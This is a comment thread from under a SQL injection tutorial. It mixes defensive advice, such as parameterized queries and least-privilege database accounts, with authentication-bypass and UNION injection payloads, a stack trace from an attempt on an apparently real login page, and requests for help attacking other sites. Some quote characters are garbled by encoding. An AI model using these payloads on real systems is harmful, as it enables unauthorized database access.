Thanks a lot..well, it is good tutorial, i was trying with stuff given here with a login page. Whenever i inject '1 or1' in username field/ password field the error page is displayed . the application is asp.net, let me know any other way to do injection. |
|
| Subject:
|
KEY TO PREVENT SQL INJECTION |
Date: |
11 Nov. 2008 |
| From: |
ANKUR |
TUTORIAL IS OFCOURSE A QUALITY ONE!!! GREAT WORK BY AUTHOR...
TO PREVENT SQL INJECTION, ALWAYS REMEMBER ONE THING: ALL INPUTS ARE EVIL.
NEVER TRUST ANY USER INPUT(EVEN WHEN ITS HARD-CODED IN HIDDEN TEXT FIELD) OR INFORMATION FROM COOKIES.
ALWAYS PARSE THE INPUT AS HTML WHILE DISPLAYING THEM ON WEBPAGE. OTHERWISE, IT MIGHT BE EXPLOITED FOR HACKING SESSION ID OR RUNNING SCRIPTS.
BEFORE EXECUTING ANY SQL QUERY, ALWAYS PARSE IT TO VALID SQL USING CONSTRAINTS.
HAPPY SQL INJECTING... |
|
| Subject:
|
Sql injection |
Date: |
13 Nov. 2008 |
| From: |
Shivangi Jain |
Nice Tutorial!......
Ya as if i say stored procedure is enough for preventing the sql injection that is not correct because it can also affected by sql injection . so for preventing this You must use stored procedure and you must validate your all input fireld and you must set the Max length or the type that it may be integer or string and you must encoded all inputs as html . and Repace some of the keywords if they come in the Input fields like select , insert,update or drop, quotes etc ........
Try this but i m sure after implementing this there are less chances of happening of sqinjection ....... |
|
| Subject:
|
SQL Injection - Good Article |
Date: |
17 Nov. 2008 |
| From: |
Abhishek Ghai |
| This is really a very good and easy to understand article. |
|
| Subject:
|
SQL injection |
Date: |
4 Dec. 2008 |
| From: |
marifaj |
| Very good article about SQL Injection and presentes most usable cases of SQL Injection. |
|
| Subject:
|
None |
Date: |
31 Dec. 2008 |
| From: |
Anonymous |
For all those people using ' OR 1=1-- and are still getting invalid username or password, try using "e; instead of ', the ' in the injection part is the supposed end of the input string so if the start of the input string is a different symbol to the start of your injection, SQL will just carry on with the string, example
"e;SELECT * FROM user WHERE user="e;$inputUser"e; AND pass="e;$inputPass"e;
If $inputUser is ' OR 1=1-- , It would think thats part of the username and not another part to the query
However, if $inputUser is "e; OR 1=1-- , the query would look like this
'SELECT * FROM user WHERE user = "e;"e; OR 1=1', thats how SQL would see the query. |
|
| Subject:
|
SQL INJECTION |
Date: |
7 Apr. 2009 |
| From: |
The WaTcHeR |
Here's my question, For the username and password I enter this:
Username:or '1'='1
Password:or '1'='1
Then I get this back:
Server Error in '/MPAOnline' Application.
Incorrect syntax near '1'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near '1'.
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[SqlException: Incorrect syntax near '1'.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader() +42
MPAOnline.clsFunctions.checkLogin(Object Username, Object Password, Object schoolyear) in c:\inetpub\wwwroot\MPAOnline\Modules\clsFunctions.vb:26
MPAOnline.Login.Button1_Click(Object sender, EventArgs e) in c:\inetpub\wwwroot\MPAOnline\Login.aspx.vb:64
System.Web.UI.WebControls.Button.OnClick(EventArgs e) +108
System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument) +57
System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument) +18
System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData) +33
System.Web.UI.Page.ProcessRequestMain() +1292
What should I do?
Also, I notice that when entering things like:
Username:a"e;="e;a
It replaces the double quotes with " so that the source code looks like this:
value="e;a"="a"e; If you put " in the username, it replaces " with &. |
|
| Subject:
|
Sql injection |
Date: |
1 May 2009 |
| From: |
Jonny |
$db = new PDO('pgsql:dbname=database');
$stmt = $db->prepare("e;SELECT priv FROM testUsers WHERE username=:username AND password=:password"e;);
$stmt->bindParam(':username', $user);
$stmt->bindParam(':password', $pass);
$stmt->execute();
Basically, it assigns parameters to the query rather than concatenating the query together to be run. By doing this, you ensure that your parameters will be interpreted as parameters (text) and not sql. So by using this method you are 100% secure for sql injections. However rfi or xss attacks may still be a problem :P Hope this helped anybody who was looking for a solution.
|
|
| Subject:
|
Good Artilcle |
Date: |
26 Oct. 2009 |
| From: |
mahato.sunilkumargmail.com |
| This Article open my eyes how to write better sql query |
|
| Subject:
|
Very nice turtorial |
Date: |
23 Nov. 2009 |
| From: |
HarnorizerHarnorizerharnorizeryahoo.ca |
| Very nice tutorial, but i have one problem, any time i try SQL injection, it does'nt work, i dont know if its that i choose non-vulnerable site or what? i realy wanna do SQL injection, but i have never suceeded...pls someone help me... harnorizer@yahoo.ca |
|
| Subject:
|
What about Oracle |
Date: |
25 Nov. 2009 |
| From: |
BEDEbogdincescuyahoo.com |
Just fine!
Yet, being Oracle devaloper, I think one do that in a well designed Oracle application.
That is because the web application would normally logon to the Oracle database as a dumb user that will see no database tables and will only have priviledges for executing procedures in a number of packages (packages will allow to get only the intended data processing and hide the database structures). And using packages that would definitely not allow host procedure calls.
My conclusion: MS Servers suck, so that MS would better stick to workstations and Office applications. |
|
| Subject:
|
InsertUpdate |
Date: |
7 Dec. 2009 |
| From: |
Bob |
Great article, thank you it helps me a lot !
Just 1 question, is it possible to execute insert or update after a select statement with MYSQL/php ?
I saw your example with MSSQL Server but it seems that it's not working with MYSQL.
Something like
...page.php?id=5 union select 1,1,1; insert .... from .... --
fails but
...page.php?id=5 union select 1,1,1 --
works fine
Any ideas ?
thank you |
|
| Subject:
|
useful but |
Date: |
6 Jan. 2010 |
| From: |
Just like Bourne |
| Pretty useful but, there is no opportunity to try injection into any webpages allowed to do so as a practice so that I can see whether it really works. |
|
| Subject:
|
;D |
Date: |
11 Jan. 2010 |
| From: |
Packetdeath |
| The thing is, a lot of this is not well known, even though this subject is put out on so many different pages - often times Administrators don't even know they've been hacked. ;) That is to say that, once your in, if you don't do something that yells "e;I hacked your site."e; the people, or person, as it may be won't even know, so the vulnerability goes unpatched/fixed. |
|
| Subject:
|
Nice Article |
Date: |
12 Jan. 2010 |
| From: |
Up |
| Nice article on SQL Injection! |
|
| Subject:
|
how to inject |
Date: |
1 Feb. 2010 |
| From: |
ut4ever4u |
how to inject a new SQL file if The file is not injected allready in the site to access the Database. please tell me the stepwise complete process to use "e;metasploit"e; for injecting a file in any website's webpage.
I want to inject a file in my comps. website check its security level.
please rply me on the same ID( as my name mentioned here) of ggle mail.
thanx: |
|
| Subject:
|
Really Very Helping |
Date: |
1 Feb. 2010 |
| From: |
Sam |
| It is really helpful for beginners like me..Thanks for this
|
|
| Subject:
|
1 more |
Date: |
8 Feb. 2010 |
| From: |
Dkid |
Remember that after development you should create a user to do the normal things...
If the website only shows data (select) you should only have an user that do selects in the SQL server..
Why use the root user if isn't necessary?
Think about it |
|
|
|
|
